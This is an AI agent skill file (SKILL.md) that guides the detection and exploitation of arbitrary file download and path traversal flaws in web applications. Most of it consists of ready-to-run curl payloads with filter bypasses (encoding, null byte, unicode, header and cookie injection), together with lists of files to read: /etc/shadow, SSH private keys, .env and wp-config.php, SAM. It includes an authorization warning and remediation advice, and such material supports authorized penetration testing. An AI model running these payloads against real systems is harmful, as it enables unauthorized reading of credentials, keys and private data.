exploit-file-download - SKILL.md Agent Skill

name: exploit-file-download description: Arbitrary file download vulnerability detection and exploitation using path traversal techniques, bypass methods, and sensitive file discovery. Use this skill when user needs to test for file download vulnerabilities, path traversal, or read sensitive files on target systems.

Arbitrary File Download Detection & Exploitation

Authorization Warning

DANGER: File download vulnerability testing can expose sensitive system files and user data. Always ensure you have:

Written permission from the target system owner
Isolated testing environment
Defined scope of testing
Legal compliance with local regulations

Never test file download vulnerabilities on production systems without authorization.

Prerequisites

Required Tools

# Python 3 with requests library
pip install requests

# Optional: curl for manual testing
# Built-in on most systems

Optional Tools

# Burp Suite for manual testing
# OWASP ZAP for automated scanning
# ffuf for parameter fuzzing

Quick Start

Basic Path Traversal Test

# Manual test with curl
curl "https://target.com/download?file=../../../etc/passwd"

# Using the automated tester
python scripts/file_download_tester.py -u "https://target.com/download?file=document.pdf"

Sensitive File Scanner

# Scan for sensitive files after confirming vulnerability
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

Common Scenarios

1. Basic Path Traversal Testing

Test for basic directory traversal vulnerabilities:

# Manual testing
curl "https://target.com/download?file=../../../etc/passwd"
curl "https://target.com/download?file=....//....//etc/passwd"

# Automated testing
python scripts/file_download_tester.py -u "https://target.com/download?file=test.pdf"

What to check:

Does the parameter accept ../ sequences?
Can you access files outside the intended directory?
What is the response when accessing system files?

Common payload patterns:

../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini

2. URL Encoded Bypass

When basic traversal is blocked, try URL encoding:

# Single URL encoding
curl "https://target.com/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double URL encoding
curl "https://target.com/download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"

Encoding variations:

Type	Payload
URL encoded	`%2e%2e%2f`
Double encoded	`%252e%252e%252f`
Mixed	`..%2f..%2f`

3. Null Byte Injection

When extension validation exists:

# Null byte to truncate extension check
curl "https://target.com/download?file=../../../etc/passwd%00.jpg"
curl "https://target.com/download?file=../../../etc/passwd%00.png"

Works against:

Simple extension validation
Some path sanitization filters

4. Unicode/Double Write Bypass

When standard payloads are filtered:

# Unicode encoding
curl "https://target.com/download?file=..%c0%af..%c0%af..%c0%afetc/passwd"

# Double write (....//)
curl "https://target.com/download?file=....//....//....//etc/passwd"

# Mixed separators
curl "https://target.com/download?file=..%5c..%5c..%5cetc/passwd"

5. Sensitive File Discovery

After confirming vulnerability, discover sensitive files:

# Linux targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

# Windows targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os windows

# Custom file list
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --wordlist custom_files.txt

High-value targets (Linux):

/etc/passwd          - User accounts
/etc/shadow          - Password hashes (requires root)
/etc/hosts           - Host mappings
/proc/self/environ   - Environment variables
/var/log/apache2/access.log - Access logs
/home/user/.ssh/id_rsa - SSH private keys
/var/www/html/config.php - Web app configs

High-value targets (Windows):

C:\Windows\win.ini           - Windows configuration
C:\Windows\System32\config\SAM - User accounts
C:\inetpub\wwwroot\web.config - IIS configuration
C:\Users\Administrator\.ssh\id_rsa - SSH keys

6. Application Config Discovery

Target web application configuration files:

# Common web app configs
../../../var/www/html/config.php
../../../var/www/html/wp-config.php
../../../app/config/database.yml
../../../.env
../../../web.config

Framework-specific paths:

Framework	Config Path
WordPress	`wp-config.php`
Laravel	`.env`
Django	`settings.py`
ASP.NET	`web.config`
Spring	`application.properties`

7. POST Request Testing

Test POST parameters for file download:

# Save request to file
cat > request.txt << 'EOF'
POST /download HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

file=document.pdf
EOF

# Test with curl
curl -X POST "https://target.com/download" -d "file=../../../etc/passwd"

8. Cookie/Header Testing

Test non-parameter injection points:

# Cookie parameter
curl "https://target.com/download" --cookie "filename=../../../etc/passwd"

# Custom header
curl "https://target.com/download" -H "X-File-Path: ../../../etc/passwd"

# Referer header
curl "https://target.com/download" -H "Referer: https://target.com/?file=../../../etc/passwd"

Tool Selection Guide

Scenario	Tool	Command
Quick manual test	curl	`curl "URL?file=../../../etc/passwd"`
Automated scanning	file_download_tester.py	`python scripts/file_download_tester.py -u URL`
Sensitive file scan	sensitive_file_scanner.py	`python scripts/sensitive_file_scanner.py -u URL --os linux`
Parameter fuzzing	ffuf	`ffuf -u "URL?file=FUZZ" -w wordlist.txt`
Custom payload test	curl	`curl "URL?file=$(cat payload.txt)"`

Testing Checklist

Discovery Phase

Identify all download endpoints (URL params, forms, API endpoints)
Test basic path traversal (../)
Check response headers for file type information

Bypass Testing

URL encoding (%2e%2e%2f)
Double URL encoding (%252e%252e%252f)
Null byte injection (%00)
Unicode encoding (%c0%af)
Double write (....//)
Mixed separators (..\ on Windows)
Path truncation

Sensitive File Testing

Linux system files (/etc/passwd, /etc/shadow)
Windows system files (win.ini, SAM)
Application configs (.env, config.php)
SSH keys (id_rsa, authorized_keys)
Log files (access.log, error.log)
Database files

Post-Exploitation

Document all accessible files
Identify sensitive data exposed
Report severity based on data sensitivity

Resources

Scripts

scripts/file_download_tester.py - Automated vulnerability detection
scripts/sensitive_file_scanner.py - Sensitive file enumeration

Reference Documentation

references/bypass_techniques.md - Detailed bypass methods
references/sensitive_files.md - Comprehensive file lists

Assets/Wordlists

assets/traversal_payloads.txt - Path traversal payloads
assets/linux_sensitive_files.txt - Linux sensitive file paths
assets/windows_sensitive_files.txt - Windows sensitive file paths

External Resources

Reporting Format

When reporting file download vulnerabilities, include:

╔═══════════════════════════════════════════════════════╗
║         File Download Vulnerability Report            ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/download                   ║
║ Type: Path Traversal                                  ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: file
Payload: ../../../etc/passwd

Proof of Concept:
curl "https://target.com/download?file=../../../etc/passwd"

Files Confirmed Accessible:
- /etc/passwd (user accounts)
- /etc/hosts (network config)
- /var/www/html/config.php (database credentials)

Impact:
- Access to sensitive system files
- Exposure of database credentials
- Potential for further exploitation

Recommendations:
- Implement strict path validation
- Use allowlist for permitted files
- Sanitize user input for path characters
- Use chroot or container isolation